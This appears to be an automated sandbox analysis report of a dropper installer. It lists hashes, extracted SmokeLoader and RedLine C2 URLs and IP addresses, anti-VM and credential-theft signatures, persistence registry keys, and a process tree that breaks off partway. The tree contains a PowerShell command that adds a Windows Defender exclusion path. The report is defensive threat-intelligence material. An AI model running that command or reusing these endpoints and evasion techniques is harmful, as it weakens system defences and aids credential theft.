Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
11-10-2021 20:45
211011-zjxjlsabbm 1011-10-2021 13:10
211011-qegsxshcfp 1011-10-2021 10:55
211011-mz7y3ahaak 1010-10-2021 19:24
211010-x4mtssgae2 10Analysis
-
max time kernel
1777s -
max time network
1807s -
platform
windows7_x64 -
resource
win7-de-20210920 -
submitted
11-10-2021 13:10
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
3.9MB
-
MD5
a4d23ac3c7172b9aa02e35b6bf0fd21f
-
SHA1
0326aab7deddfefc048c9a67ac9ce4ee14ea9003
-
SHA256
9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806
-
SHA512
9e425d8a1beaeabfc983bb75a7a5f8a8c0823e825e9f66e17b0f515b2897da9f2d9b2f1aa9939fdbae6c826c2c730d3bc772abec9e35a61d3d73a6cdb87ddf10
Malware Config
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Extracted
redline
she
135.181.129.119:4805
Extracted
redline
ANI
45.142.215.47:27643
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
resource yara_rule behavioral3/memory/576-204-0x00000000017E0000-0x00000000017FF000-memory.dmp family_redline behavioral3/memory/576-224-0x0000000001A90000-0x0000000001AAD000-memory.dmp family_redline behavioral3/memory/2624-233-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral3/memory/2624-234-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral3/memory/2624-235-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral3/memory/2624-236-0x000000000041B23A-mapping.dmp family_redline behavioral3/memory/2624-238-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 4 IoCs
resource yara_rule behavioral3/files/0x0005000000012634-104.dat family_socelars behavioral3/files/0x0005000000012634-165.dat family_socelars behavioral3/files/0x0005000000012634-147.dat family_socelars behavioral3/memory/2468-230-0x0000000001F70000-0x0000000002BBA000-memory.dmp family_socelars -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
resource yara_rule behavioral3/files/0x00050000000125c1-70.dat aspack_v212_v242 behavioral3/files/0x00050000000125c1-71.dat aspack_v212_v242 behavioral3/files/0x0007000000012275-72.dat aspack_v212_v242 behavioral3/files/0x0007000000012275-73.dat aspack_v212_v242 behavioral3/files/0x00050000000125d3-76.dat aspack_v212_v242 behavioral3/files/0x00050000000125d3-77.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 25 IoCs
pid Process 784 setup_installer.exe 1992 setup_install.exe 576 Sun15f1b1f8c669.exe 1664 Sun152bab5a2de.exe 556 Sun1507db358fce61c0b.exe 520 Sun152e52d07b74d9b5.exe 652 rundll32.exe 1160 Sun158d8ef840.exe 1632 Sun152bea652bd7232.exe 1548 Sun15901f2f025e.exe 1040 Sun15f67075f27a2b5b.exe 1136 Sun15dbd675f871ca.exe 672 09xU.exE 2600 cy3kSrs91iP0oHt4myGTMexE.exe 2624 Sun159ff1acacf.exe 2952 2139327.scr 3016 8472186.scr 2220 2791837.scr 2160 2946390.scr 2332 Sun1577c3e159a3e3815.exe 768 WinHoster.exe 2972 8C0A.exe 564 veejcgt 1404 veejcgt 2980 veejcgt -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2791837.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2791837.scr -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation Sun15dbd675f871ca.exe -
Loads dropped DLL 64 IoCs
pid Process 972 setup_x86_x64_install.exe 784 setup_installer.exe 784 setup_installer.exe 784 setup_installer.exe 784 setup_installer.exe 784 setup_installer.exe 784 setup_installer.exe 1992 setup_install.exe 1992 setup_install.exe 1992 setup_install.exe 1992 setup_install.exe 1992 setup_install.exe 1992 setup_install.exe 1992 setup_install.exe 1992 setup_install.exe 1568 cmd.exe 1756 cmd.exe 1756 cmd.exe 936 cmd.exe 1340 cmd.exe 1996 cmd.exe 1036 cmd.exe 1036 cmd.exe 880 cmd.exe 764 cmd.exe 1792 cmd.exe 1404 cmd.exe 1404 cmd.exe 1664 Sun152bab5a2de.exe 1664 Sun152bab5a2de.exe 652 rundll32.exe 652 rundll32.exe 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 556 Sun1507db358fce61c0b.exe 556 Sun1507db358fce61c0b.exe 576 Sun15f1b1f8c669.exe 576 Sun15f1b1f8c669.exe 1548 Sun15901f2f025e.exe 1548 Sun15901f2f025e.exe 1160 Sun158d8ef840.exe 1160 Sun158d8ef840.exe 1868 cmd.exe 672 09xU.exE 672 09xU.exE 2468 rundll32.exe 2468 rundll32.exe 2468 rundll32.exe 1136 Sun15dbd675f871ca.exe 652 rundll32.exe 2624 Sun159ff1acacf.exe 2624 Sun159ff1acacf.exe 2896 WerFault.exe 2896 WerFault.exe 2896 WerFault.exe 2896 WerFault.exe 2896 WerFault.exe 1984 cmd.exe 1984 cmd.exe 2332 Sun1577c3e159a3e3815.exe 2332 Sun1577c3e159a3e3815.exe 3016 8472186.scr 768 WinHoster.exe 768 WinHoster.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 8472186.scr -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2791837.scr -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 32 ipinfo.io 12 ip-api.com 30 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2220 2791837.scr -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 652 set thread context of 2624 652 rundll32.exe 71 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 2896 1136 WerFault.exe 43 1492 520 WerFault.exe 56 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1507db358fce61c0b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI veejcgt Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI veejcgt Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI veejcgt Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI veejcgt Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1507db358fce61c0b.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1507db358fce61c0b.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI veejcgt Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI veejcgt Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI veejcgt Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI veejcgt Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI veejcgt -
Kills process with taskkill 3 IoCs
pid Process 1784 taskkill.exe 1668 taskkill.exe 1584 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun15f67075f27a2b5b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun15f67075f27a2b5b.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun152bab5a2de.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun152bab5a2de.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun152bab5a2de.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 556 Sun1507db358fce61c0b.exe 556 Sun1507db358fce61c0b.exe 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe 1296 Process not Found 1136 Sun15dbd675f871ca.exe 1136 Sun15dbd675f871ca.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 1296 Process not Found 2896 WerFault.exe 1492 WerFault.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 556 Sun1507db358fce61c0b.exe 564 veejcgt 1404 veejcgt 2980 veejcgt -
Suspicious use of AdjustPrivilegeToken 59 IoCs
description pid Process Token: SeCreateTokenPrivilege 1548 Sun15901f2f025e.exe Token: SeAssignPrimaryTokenPrivilege 1548 Sun15901f2f025e.exe Token: SeLockMemoryPrivilege 1548 Sun15901f2f025e.exe Token: SeIncreaseQuotaPrivilege 1548 Sun15901f2f025e.exe Token: SeMachineAccountPrivilege 1548 Sun15901f2f025e.exe Token: SeTcbPrivilege 1548 Sun15901f2f025e.exe Token: SeSecurityPrivilege 1548 Sun15901f2f025e.exe Token: SeTakeOwnershipPrivilege 1548 Sun15901f2f025e.exe Token: SeLoadDriverPrivilege 1548 Sun15901f2f025e.exe Token: SeSystemProfilePrivilege 1548 Sun15901f2f025e.exe Token: SeSystemtimePrivilege 1548 Sun15901f2f025e.exe Token: SeProfSingleProcessPrivilege 1548 Sun15901f2f025e.exe Token: SeIncBasePriorityPrivilege 1548 Sun15901f2f025e.exe Token: SeCreatePagefilePrivilege 1548 Sun15901f2f025e.exe Token: SeCreatePermanentPrivilege 1548 Sun15901f2f025e.exe Token: SeBackupPrivilege 1548 Sun15901f2f025e.exe Token: SeRestorePrivilege 1548 Sun15901f2f025e.exe Token: SeShutdownPrivilege 1548 Sun15901f2f025e.exe Token: SeDebugPrivilege 1548 Sun15901f2f025e.exe Token: SeAuditPrivilege 1548 Sun15901f2f025e.exe Token: SeSystemEnvironmentPrivilege 1548 Sun15901f2f025e.exe Token: SeChangeNotifyPrivilege 1548 Sun15901f2f025e.exe Token: SeRemoteShutdownPrivilege 1548 Sun15901f2f025e.exe Token: SeUndockPrivilege 1548 Sun15901f2f025e.exe Token: SeSyncAgentPrivilege 1548 Sun15901f2f025e.exe Token: SeEnableDelegationPrivilege 1548 Sun15901f2f025e.exe Token: SeManageVolumePrivilege 1548 Sun15901f2f025e.exe Token: SeImpersonatePrivilege 1548 Sun15901f2f025e.exe Token: SeCreateGlobalPrivilege 1548 Sun15901f2f025e.exe Token: 31 1548 Sun15901f2f025e.exe Token: 32 1548 Sun15901f2f025e.exe Token: 33 1548 Sun15901f2f025e.exe Token: 34 1548 Sun15901f2f025e.exe Token: 35 1548 Sun15901f2f025e.exe Token: SeDebugPrivilege 1784 taskkill.exe Token: SeDebugPrivilege 520 Sun152e52d07b74d9b5.exe Token: SeDebugPrivilege 1040 Sun15f67075f27a2b5b.exe Token: SeShutdownPrivilege 1296 Process not Found Token: SeShutdownPrivilege 1296 Process not Found Token: SeShutdownPrivilege 1296 Process not Found Token: SeDebugPrivilege 2896 WerFault.exe Token: SeShutdownPrivilege 1296 Process not Found Token: SeDebugPrivilege 1492 WerFault.exe Token: SeDebugPrivilege 2952 2139327.scr Token: SeShutdownPrivilege 1296 Process not Found Token: SeDebugPrivilege 2160 2946390.scr Token: SeDebugPrivilege 2624 Sun159ff1acacf.exe Token: SeDebugPrivilege 576 Sun15f1b1f8c669.exe Token: SeDebugPrivilege 1668 taskkill.exe Token: SeDebugPrivilege 1584 taskkill.exe Token: SeShutdownPrivilege 1296 Process not Found Token: SeShutdownPrivilege 1296 Process not Found Token: SeDebugPrivilege 2972 8C0A.exe Token: SeShutdownPrivilege 1296 Process not Found Token: SeShutdownPrivilege 1296 Process not Found Token: SeShutdownPrivilege 1296 Process not Found Token: SeShutdownPrivilege 1296 Process not Found Token: SeShutdownPrivilege 1296 Process not Found Token: SeShutdownPrivilege 1296 Process not Found -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 972 wrote to memory of 784 972 setup_x86_x64_install.exe 28 PID 972 wrote to memory of 784 972 setup_x86_x64_install.exe 28 PID 972 wrote to memory of 784 972 setup_x86_x64_install.exe 28 PID 972 wrote to memory of 784 972 setup_x86_x64_install.exe 28 PID 972 wrote to memory of 784 972 setup_x86_x64_install.exe 28 PID 972 wrote to memory of 784 972 setup_x86_x64_install.exe 28 PID 972 wrote to memory of 784 972 setup_x86_x64_install.exe 28 PID 784 wrote to memory of 1992 784 setup_installer.exe 29 PID 784 wrote to memory of 1992 784 setup_installer.exe 29 PID 784 wrote to memory of 1992 784 setup_installer.exe 29 PID 784 wrote to memory of 1992 784 setup_installer.exe 29 PID 784 wrote to memory of 1992 784 setup_installer.exe 29 PID 784 wrote to memory of 1992 784 setup_installer.exe 29 PID 784 wrote to memory of 1992 784 setup_installer.exe 29 PID 1992 wrote to memory of 1720 1992 setup_install.exe 31 PID 1992 wrote to memory of 1720 1992 setup_install.exe 31 PID 1992 wrote to memory of 1720 1992 setup_install.exe 31 PID 1992 wrote to memory of 1720 1992 setup_install.exe 31 PID 1992 wrote to memory of 1720 1992 setup_install.exe 31 PID 1992 wrote to memory of 1720 1992 setup_install.exe 31 PID 1992 wrote to memory of 1720 1992 setup_install.exe 31 PID 1992 wrote to memory of 1340 1992 setup_install.exe 32 PID 1992 wrote to memory of 1340 1992 setup_install.exe 32 PID 1992 wrote to memory of 1340 1992 setup_install.exe 32 PID 1992 wrote to memory of 1340 1992 setup_install.exe 32 PID 1992 wrote to memory of 1340 1992 setup_install.exe 32 PID 1992 wrote to memory of 1340 1992 setup_install.exe 32 PID 1992 wrote to memory of 1340 1992 setup_install.exe 32 PID 1992 wrote to memory of 880 1992 setup_install.exe 33 PID 1992 wrote to memory of 880 1992 setup_install.exe 33 PID 1992 wrote to memory of 880 1992 setup_install.exe 33 PID 1992 wrote to memory of 880 1992 setup_install.exe 33 PID 1992 wrote to memory of 880 1992 setup_install.exe 33 PID 1992 wrote to memory of 880 1992 setup_install.exe 33 PID 1992 wrote to memory of 880 1992 setup_install.exe 33 PID 1992 wrote to memory of 1792 1992 setup_install.exe 34 PID 1992 wrote to memory of 1792 1992 setup_install.exe 34 PID 1992 wrote to memory of 1792 1992 setup_install.exe 34 PID 1992 wrote to memory of 1792 1992 setup_install.exe 34 PID 1992 wrote to memory of 1792 1992 setup_install.exe 34 PID 1992 wrote to memory of 1792 1992 setup_install.exe 34 PID 1992 wrote to memory of 1792 1992 setup_install.exe 34 PID 1992 wrote to memory of 764 1992 setup_install.exe 35 PID 1992 wrote to memory of 764 1992 setup_install.exe 35 PID 1992 wrote to memory of 764 1992 setup_install.exe 35 PID 1992 wrote to memory of 764 1992 setup_install.exe 35 PID 1992 wrote to memory of 764 1992 setup_install.exe 35 PID 1992 wrote to memory of 764 1992 setup_install.exe 35 PID 1992 wrote to memory of 764 1992 setup_install.exe 35 PID 1992 wrote to memory of 1984 1992 setup_install.exe 36 PID 1992 wrote to memory of 1984 1992 setup_install.exe 36 PID 1992 wrote to memory of 1984 1992 setup_install.exe 36 PID 1992 wrote to memory of 1984 1992 setup_install.exe 36 PID 1992 wrote to memory of 1984 1992 setup_install.exe 36 PID 1992 wrote to memory of 1984 1992 setup_install.exe 36 PID 1992 wrote to memory of 1984 1992 setup_install.exe 36 PID 1992 wrote to memory of 1756 1992 setup_install.exe 37 PID 1992 wrote to memory of 1756 1992 setup_install.exe 37 PID 1992 wrote to memory of 1756 1992 setup_install.exe 37 PID 1992 wrote to memory of 1756 1992 setup_install.exe 37 PID 1992 wrote to memory of 1756 1992 setup_install.exe 37 PID 1992 wrote to memory of 1756 1992 setup_install.exe 37 PID 1992 wrote to memory of 1756 1992 setup_install.exe 37 PID 1992 wrote to memory of 1404 1992 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152bab5a2de.exe4⤵
- Loads dropped DLL
PID:1340 -
C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun152bab5a2de.exeSun152bab5a2de.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1664
-
-
-
